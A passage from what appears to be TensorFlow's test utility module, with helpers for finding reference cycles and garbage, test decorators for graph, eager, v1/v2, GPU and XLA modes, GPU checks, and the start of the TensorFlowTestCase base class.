id(obj), [describe(e, blacklist, leaves_only=True) for e in obj])
elif isinstance(obj, dict):
return "dict({}): {} keys".format(id(obj), len(obj.keys()))
elif tf_inspect.isfunction(obj):
return "function({}) {}; globals ID: {}".format(
id(obj), obj.__name__, id(obj.__globals__))
else:
return "{}, {}".format(type(obj), id(obj))
def build_ref_graph(obj, graph, reprs, blacklist):
"""Builds a reference graph as <referrer> -> <list of referents>.
Args:
obj: The object to start from. The graph will be built by recursively
adding its referrers.
graph: Dict holding the graph to be built. To avoid creating extra
references, the graph holds object IDs rather than actual objects.
reprs: Auxiliary structure that maps object IDs to their human-readable
description.
blacklist: List of objects to ignore.
"""
referrers = gc.get_referrers(obj)
blacklist = blacklist + (referrers,)
obj_id = id(obj)
for r in referrers:
if get_ignore_reason(r, blacklist) is None:
r_id = id(r)
if r_id not in graph:
graph[r_id] = []
if obj_id not in graph[r_id]:
graph[r_id].append(obj_id)
build_ref_graph(r, graph, reprs, blacklist)
reprs[r_id] = describe(r, blacklist)
def find_cycle(el, graph, reprs, path):
"""Finds and prints a single cycle in the dependency graph."""
if el not in graph:
return
for r in graph[el]:
if r in path:
logging.error("Reference cycle sample:")
for p in path + (r,):
logging.error(reprs.get(p, "unknown object " + str(p)))
return True
else:
if find_cycle(r, graph, reprs, path + (r,)):
return True
return False
obj = objects[idx]
graph = {} # referrer ID -> object ID
reprs = {} # object ID -> description
build_ref_graph(obj, graph, reprs, (objects, graph, reprs, get_ignore_reason,
describe, build_ref_graph, find_cycle))
for k in graph:
if find_cycle(k, graph, reprs, ()):
return True
return False
def assert_no_garbage_created(f):
"""Test method decorator to assert that no garbage has been created.
Note that this decorator sets DEBUG_SAVEALL, which in some Python interpreters
cannot be un-set (i.e. will disable garbage collection for any other unit
tests in the same file/shard).
Args:
f: The function to decorate.
Returns:
The decorated function.
"""
def decorator(self, **kwargs):
"""Sets DEBUG_SAVEALL, runs the test, and checks for new garbage."""
# Force-load `distribution_strategy_context` to prevent GC at
# test time when using eager. Remove once b/117329403 is resolved.
tape.distribution_strategy_context.get_strategy()
gc.disable()
previous_debug_flags = gc.get_debug()
gc.set_debug(gc.DEBUG_SAVEALL)
gc.collect()
previous_garbage = len(gc.garbage)
result = f(self, **kwargs)
gc.collect()
new_garbage = len(gc.garbage)
if new_garbage > previous_garbage:
logging.error(
"The decorated test created work for Python's garbage collector, "
"likely due to a reference cycle. New objects in cycle(s):")
for i, obj in enumerate(gc.garbage[previous_garbage:]):
try:
logging.error("Object %d of %d", i,
len(gc.garbage) - previous_garbage)
def _safe_object_str(obj):
return "<%s %d>" % (obj.__class__.__name__, id(obj))
logging.error(" Object type: %s", _safe_object_str(obj))
logging.error(
" Referrer types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referrers(obj)]))
logging.error(
" Referent types: %s", ", ".join(
[_safe_object_str(ref) for ref in gc.get_referents(obj)]))
logging.error(" Object attribute names: %s", dir(obj))
logging.error(" Object __str__:")
logging.error(obj)
logging.error(" Object __repr__:")
logging.error(repr(obj))
except Exception: # pylint: disable=broad-except
logging.error("(Exception while printing object)")
# When garbage is created, this call can help identify reference cycles,
# which are typically the cause of such garbage.
if new_garbage > previous_garbage:
for i in range(previous_garbage, new_garbage):
if _find_reference_cycle(gc.garbage, i):
break
# This will fail if any garbage has been created, typically because of a
# reference cycle.
self.assertEqual(previous_garbage, new_garbage)
# TODO(allenl): Figure out why this debug flag reset doesn't work. It would
# be nice to be able to decorate arbitrary tests in a large test suite and
# not hold on to every object in other tests.
gc.set_debug(previous_debug_flags)
gc.enable()
return result
return decorator
def _combine_named_parameters(**kwargs):
"""Generate combinations based on its keyword arguments.
Two sets of returned combinations can be concatenated using +. Their product
can be computed using `times()`.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
sort_by_key = lambda k: k[0]
combinations = []
for key, values in sorted(kwargs.items(), key=sort_by_key):
if not isinstance(values, list):
values = [values]
combinations.append([(key, value) for value in values])
return [OrderedDict(result) for result in itertools.product(*combinations)]
def generate_combinations_with_testcase_name(**kwargs):
"""Generate combinations based on its keyword arguments using combine().
This function calls combine() and appends a testcase name to the list of
dictionaries returned. The 'testcase_name' key is a required for named
parameterized tests.
Args:
**kwargs: keyword arguments of form `option=[possibilities, ...]` or
`option=the_only_possibility`.
Returns:
a list of dictionaries for each combination. Keys in the dictionaries are
the keyword argument names. Each key has one value - one of the
corresponding keyword argument values.
"""
combinations = _combine_named_parameters(**kwargs)
named_combinations = []
for combination in combinations:
assert isinstance(combination, OrderedDict)
name = "".join([
"_{}_{}".format("".join(filter(str.isalnum, key)),
"".join(filter(str.isalnum, str(value))))
for key, value in combination.items()
])
named_combinations.append(
OrderedDict(
list(combination.items()) +
[("testcase_name", "_test{}".format(name))]))
return named_combinations
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name.startswith("testSkipEager") or
name.startswith("test_skip_eager") or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def build_as_function_and_v1_graph(func=None):
"""Run a test case in v1 graph mode and inside tf.function in eager mode.
WARNING: This decorator can only be used in test cases that statically checks
generated graph. Attempting to evaluate graph or function results via.
session.run() or self.evaluate() will fail.
WARNING: This decorator can only be used for test cases that inherit from
absl.testing.parameterized.TestCase.
Args:
func: Test case function to be decorated.
Returns:
Decorated test case function.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_mode_and_function` only supports test methods.")
@parameterized.named_parameters(("_v1_graph", "v1_graph"),
("_function", "function"))
@functools.wraps(f)
def decorated(self, run_mode, *args, **kwargs):
if run_mode == "v1_graph":
with ops.Graph().as_default():
f(self, *args, **kwargs)
elif run_mode == "function":
@def_function.function
def function_in_eager():
f(self, *args, **kwargs)
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
function_in_eager()
ops.dismantle_graph(graph_for_eager_test)
else:
return ValueError("Unknown run mode %s" % run_mode)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_in_async_and_sync_mode(f):
"""Execute the test in async mode and sync mode."""
@parameterized.named_parameters([("Async", True), ("", False)])
@functools.wraps(f)
def decorator(self, async_mode, *args, **kwargs):
if async_mode:
with context.execution_mode(context.ASYNC):
f(self, *args, **kwargs)
else:
with context.execution_mode(context.SYNC):
f(self, *args, **kwargs)
return decorator
def eager_lazy_remote_copy_on_and_off(f):
"""Execute the test method w/o lazy tensor copy for function remote inputs."""
@parameterized.named_parameters([("WithLazyRemoteCopy", True), ("", False)])
@functools.wraps(f)
def decorator(self, lazily_remote_copy, *args, **kwargs):
if lazily_remote_copy:
context.context().lazy_remote_inputs_copy = True
else:
context.context().lazy_remote_inputs_copy = False
f(self, *args, **kwargs)
return decorator
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.compat.v1.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the session
when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_in_graph_and_eager_modes`?")
def decorated(self, *args, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, *args, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/device:CPU:0"):
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return tf_decorator.make_decorator(f, decorated)
if func is not None:
return decorator(func)
return decorator
def py_func_if_in_function(f):
def decorated(*args, **kwds):
if not ops.inside_function():
return f(*args, **kwds)
tensor_args = []
tensor_indices = []
for i, arg in enumerate(args):
if isinstance(arg, (ops.Tensor, variables.Variable)):
tensor_args.append(arg)
tensor_indices.append(i)
def inner_f(*inner_tensor_args):
my_args = list(args)
for i, n in zip(tensor_indices, inner_tensor_args):
my_args[i] = n
return f(*my_args, **kwds)
return script_ops.py_func(inner_f, tensor_args, [])
return tf_decorator.make_decorator(f, decorated)
def also_run_as_tf_function(f):
"""Runs the decorated test twice--once as is, once inside a tf.function.
This allows you to run a test both in eager execution and inside a
tf.function, exercising the two execution modes supported in tf 2.0. The test
assertions are automatically done inside tf.py_funcs, and tf.function ensures
that they run in the proper order and with the proper side effects.
Currently variable creation is not supported in tests annotated with this
decorator since it's tricky to ensure the variable doesn't get repeatedly
created when retracing the tf.function.
Args:
f: the test method to be decorated
Returns:
The decorated test method, which will run both in eager and inside a
tf.function.
"""
def decorated(*args, **kwds):
def bound_f():
f(*args, **kwds)
with context.eager_mode():
# Running in eager mode
bound_f()
# Running as TF function
# TODO(b/121143941): Remove the autograph override.
def_function.function(bound_f, autograph=False)()
return decorated
def deprecated_graph_mode_only(func=None):
"""Execute the decorated test in graph mode.
This function returns a decorator intended to be applied to tests that are not
compatible with eager mode. When this decorator is applied, the test body will
be run in an environment where API calls construct graphs instead of executing
eagerly.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will run the decorated test method in graph mode.
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if context.executing_eagerly():
with context.graph_mode():
return f(self, *args, **kwargs)
else:
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
run_deprecated_v1 = deprecated_graph_mode_only
def run_all_in_deprecated_graph_mode_only(cls):
"""Execute all tests in a class in graph mode."""
base_decorator = deprecated_graph_mode_only
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def run_v1_only(reason, func=None):
"""Execute the decorated test only if running in v1 mode.
This function is intended to be applied to tests that exercise v1 only
functionality. If the test is run in v2 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
reason: string giving a reason for limiting the test to v1 only.
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
if not isinstance(reason, str):
raise ValueError("'reason' should be string, got {}".format(type(reason)))
def decorator(f):
if tf_inspect.isclass(f):
# To skip an entire test suite class, we only decorate the setUp method
# to skip all tests. There are cases when setUp is not defined (not
# overridden in subclasses of TestCase, so not available in f.__dict__
# below). For those cases, we walk the method resolution order list and
# pick the first setUp method we find (usually this should be the one in
# the parent class since that's the TestCase class).
for cls in type.mro(f):
setup = cls.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
break
return f
else:
# If f is just a function, just create a decorator for it and return it
def decorated(self, *args, **kwargs):
if tf2.enabled():
self.skipTest(reason)
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_v2_only(func=None):
"""Execute the decorated test only if running in v2 mode.
This function is intended to be applied to tests that exercise v2 only
functionality. If the test is run in v1 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_v2_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not tf2.enabled():
self.skipTest("Test is only compatible with v2")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_gpu_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a GPU. If a GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_gpu_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available():
self.skipTest("Test requires GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_cuda_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a CUDA GPU. If a CUDA GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator the can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_cuda_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available(cuda_only=True):
self.skipTest("Test requires CUDA GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def with_forward_compatibility_horizons(*horizons):
"""Executes the decorated test with the specified forward-compat horizons.
Args:
*horizons: A list of (year, month, day) tuples. If the list includes
`None`, then the test will also be run with no forward-compatibility
horizon set.
Returns:
A decorator that will execute the test with the specified horizons.
"""
if not horizons:
raise ValueError("Expected at least one horizon.")
for horizon in horizons:
if not ((horizon is None) or
(len(horizon) == 3 and all(isinstance(x, int) for x in horizon))):
raise ValueError("Bad horizon value: %r" % horizon)
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`with_forward_compatibility_horizons` only "
"supports test methods.")
def decorated(self, *args, **kwargs):
for horizon in horizons:
if horizon is None:
f(self, *args, **kwargs)
else:
(year, month, day) = horizon
with forward_compatibility_horizon(year, month, day):
f(self, *args, **kwargs)
return decorated
return decorator
@deprecation.deprecated(None,
"Use `tf.config.list_physical_devices('GPU')` instead.")
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
Warning: if a non-GPU version of the package is installed, the function would
also return False. Use `tf.test.is_built_with_cuda` to validate if TensorFlow
was build with CUDA support.
Args:
cuda_only: limit the search to CUDA GPUs.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
Note that the keyword arg name "cuda_only" is misleading (since routine will
return true when a GPU device is available irrespective of whether TF was
built with CUDA support or ROCm support. However no changes here because
++ Changing the name "cuda_only" to something more generic would break
backward compatibility
++ Adding an equivalent "rocm_only" would require the implementation check
the build type. This in turn would require doing the same for CUDA and thus
potentially break backward compatibility
++ Adding a new "cuda_or_rocm_only" would not break backward compatibility,
but would require most (if not all) callers to update the call to use
"cuda_or_rocm_only" instead of "cuda_only"
Returns:
True if a GPU device of the requested kind is available.
"""
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
gpu_info = gpu_util.compute_capability_from_device_desc(local_device)
cc = gpu_info.compute_capability or (0, 0)
if not min_cuda_compute_capability or cc >= min_cuda_compute_capability:
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
except errors_impl.NotFoundError as e:
if not all(x in str(e) for x in ["CUDA", "not find"]):
raise e
else:
logging.error(str(e))
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@contextlib.contextmanager
def use_gpu():
"""Uses gpu when requested and available."""
with device(use_gpu=True):
yield
@contextlib.contextmanager
def force_gpu():
"""Force the gpu to be used."""
with ops.device("/device:GPU:0"):
yield
@contextlib.contextmanager
def force_cpu():
"""Force the cpu to be used."""
with ops.device("/device:CPU:0"):
yield
class CapturedWrites(object):
"""A utility class to load the captured writes made to a stream."""
def __init__(self, capture_location):
self.capture_location = capture_location
def contents(self):
"""Get the captured writes as a single string."""
with open(self.capture_location) as tmp_file:
output_data = "".join(tmp_file.readlines())
return output_data
class FakeEagerSession(object):
"""Fake session so tests that conditionally use placeholders can use eager.
There are a number of tests that conditionally use placeholders for shape
inference. The pattern is demonstrated here:
```python
with self.cached_session() as sess:
if static_shape:
y = math_ops.matmul(x, ...)
feed_dict = {}
else:
x_ph = array_ops.placeholder(...)
y = math_ops.matmul(x_ph, ...)
feed_dict = {x_ph: x}
val = sess.run(y, feed_dict=feed_dict)
```
Since the feed_dict is empty when not using placeholders we should be able to
call self.evaluate(), however this requires rewriting the test case.
This class should be considered a stop-gap solution to get tests running with
eager with minimal changes to the actual test.
"""
def __init__(self, test_case):
self._test_case = test_case
def run(self, fetches, *args, **kwargs):
"""Evaluate `fetches`.
Fail if additional args are specified.
Args:
fetches: A Tensor or a nested list/tuple of Tensors.
*args: Positional arguments
**kwargs: Keyword arguments
Raises:
RuntimeError: If args or kwargs are specified.
Returns:
Tensors as numpy values.
"""
feed_dict = kwargs.pop("feed_dict", {})
if feed_dict:
raise RuntimeError(
"feed_dict is not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
if args or kwargs:
raise RuntimeError(
"Optional args are not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
return self._test_case.evaluate(fetches)
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run()."""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
# Note: disable the logging for OutOfRangeError, which makes the output
# of tf.data tests hard to read, because OutOfRangeError is used as the
# signal completion
if not isinstance(e, errors.OutOfRangeError):
logging.error(str(e))
raise
def disable_cudnn_autotune(func):
"""Disable autotuning during the call to this function.
Some tests want to base assertions on a graph being isomorphic with a copy.
To ensure this, this decorator disables autotuning.
Args:
func: Function to run with CuDNN autotuning turned off.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_tf_cudnn_use_autotune = os.environ.get("TF_CUDNN_USE_AUTOTUNE")
os.environ["TF_CUDNN_USE_AUTOTUNE"] = "false"
original_xla_flags = os.environ.get("XLA_FLAGS")
new_xla_flags = "--xla_gpu_autotune_level=0"
if original_xla_flags:
new_xla_flags = original_xla_flags + " " + new_xla_flags
os.environ["XLA_FLAGS"] = new_xla_flags
result = f(self, *args, **kwargs)
if (original_tf_cudnn_use_autotune is None):
del os.environ["TF_CUDNN_USE_AUTOTUNE"]
else:
os.environ["TF_CUDNN_USE_AUTOTUNE"] = original_tf_cudnn_use_autotune
if (original_xla_flags is None):
del os.environ["XLA_FLAGS"]
else:
os.environ["XLA_FLAGS"] = original_xla_flags
return result
return decorated
if func is not None:
return decorator(func)
return decorator
# The description is just for documentation purposes.
def enable_tf_xla_constant_folding(description):
if not isinstance(description, str):
raise ValueError("'description' should be string, got {}".format(
type(description)))
def enable_tf_xla_constant_folding_impl(func):
"""Enable constant folding during the call to this function.
Some tests fail without constant folding.
Args:
func: Function to run with constant folding turned on.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_var = pywrap_tf_session.TF_GetXlaConstantFoldingDisabled()
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(False)
result = f(self, *args, **kwargs)
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(original_var)
return result
return decorated
if func is not None:
return decorator(func)
return decorator
return enable_tf_xla_constant_folding_impl
# Updates test function by selectively disabling it.
def _disable_test(execute_func):
def disable_test_impl(func):
def decorator(func):
def decorated(self, *args, **kwargs):
if execute_func:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return disable_test_impl
# The description is just for documentation purposes.
def disable_xla(description): # pylint: disable=unused-argument
"""Execute the test method only if xla is not enabled."""
execute_func = not is_xla_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_mlir_bridge(description): # pylint: disable=unused-argument
"""Execute the test method only if MLIR bridge is not enabled."""
execute_func = not is_mlir_bridge_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def disable_tfrt(unused_description):
def disable_tfrt_impl(cls_or_func):
"""Execute the test only if tfrt is not enabled."""
if tf_inspect.isclass(cls_or_func):
if is_tfrt_enabled():
return None
else:
return cls_or_func
else:
def decorator(func):
def decorated(self, *args, **kwargs):
if is_tfrt_enabled():
return
else:
return func(self, *args, **kwargs)
return decorated
if cls_or_func is not None:
return decorator(cls_or_func)
return decorator
return disable_tfrt_impl
def for_all_test_methods(decorator, *args, **kwargs):
"""Generate class-level decorator from given method-level decorator.
It is expected for the given decorator to take some arguments and return
a method that is then called on the test method to produce a decorated
method.
Args:
decorator: The decorator to apply.
*args: Positional arguments
**kwargs: Keyword arguments
Returns: Function that will decorate a given classes test methods with the
decorator.
"""
def all_test_methods_impl(cls):
"""Apply decorator to all test methods in class."""
for name in dir(cls):
value = getattr(cls, name)
if callable(value) and name.startswith(
"test") and (name != "test_session"):
setattr(cls, name, decorator(*args, **kwargs)(value))
return cls
return all_test_methods_impl
# The description is just for documentation purposes.
def no_xla_auto_jit(description): # pylint: disable=unused-argument
"""This test is not intended to be run with XLA auto jit enabled."""
execute_func = not is_xla_enabled()
return _disable_test(execute_func)
# The description is just for documentation purposes.
def xla_allow_fallback(description): # pylint: disable=unused-argument
def xla_allow_fallback_impl(func):
"""Allow fallback to TF even though testing xla."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
# Update the global XLABuildOpsPassFlags to enable lazy compilation,
# which allows the compiler to fall back to TF classic. Remember the
# old value so that we can reset it.
old_value = pywrap_tf_session.TF_SetXlaEnableLazyCompilation(True)
result = func(self, *args, **kwargs)
pywrap_tf_session.TF_SetXlaEnableLazyCompilation(old_value)
return result
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return xla_allow_fallback_impl
class EagerSessionWarner(object):
def __getattr__(self, attr):
raise AttributeError(
"Trying to access properties or call methods on the result of "
"self.session(), self.cached_session(), etc while eager execution "
"is enabled. If you're porting this test case to TF 2.0, either "
"adapt the test to work with eager execution or insert a call to "
"tf.disable_eager_execution() in the main() function of this test "
"file.")
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow."""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
if is_xla_enabled():
pywrap_tf_session.TF_SetXlaAutoJitMode("2")
pywrap_tf_session.TF_SetXlaMinClusterSize(1)
pywrap_tf_session.TF_SetXlaEnableLazyCompilation(False)
pywrap_tf_session.TF_SetTfXlaCpuGlobalJit(True)
# Constant folding secretly runs code on TF:Classic CPU, so we also
# disable it here.
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(True)
self._threads = []
self._tempdir = None
self._cached_session = None
self._test_start_time = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
# Reset summary writer in case another test used set_as_default() with their
# summary writer.
summary_state = summary_ops_v2._summary_state # pylint: disable=protected-access
summary_state.writer = None
# Avoiding calling setUp() for the poorly named test_session method.
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
self._test_start_time = time.time()
def tearDown(self):
# If a subclass overrides setUp and doesn't call the parent class's setUp,
# then we may not have set the start time.
if self._test_start_time is not None:
logging.info("time(%s): %ss", self.id(),
round(time.time() - self._test_start_time, 2))
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
If you call this method multiple times during in a test, it will return the
same folder. However, across different runs the directories will be
different. This will ensure that across different runs tests will not be
able to pollute each others environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This stream must have
a file descriptor, support writing via using that file descriptor, and
must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
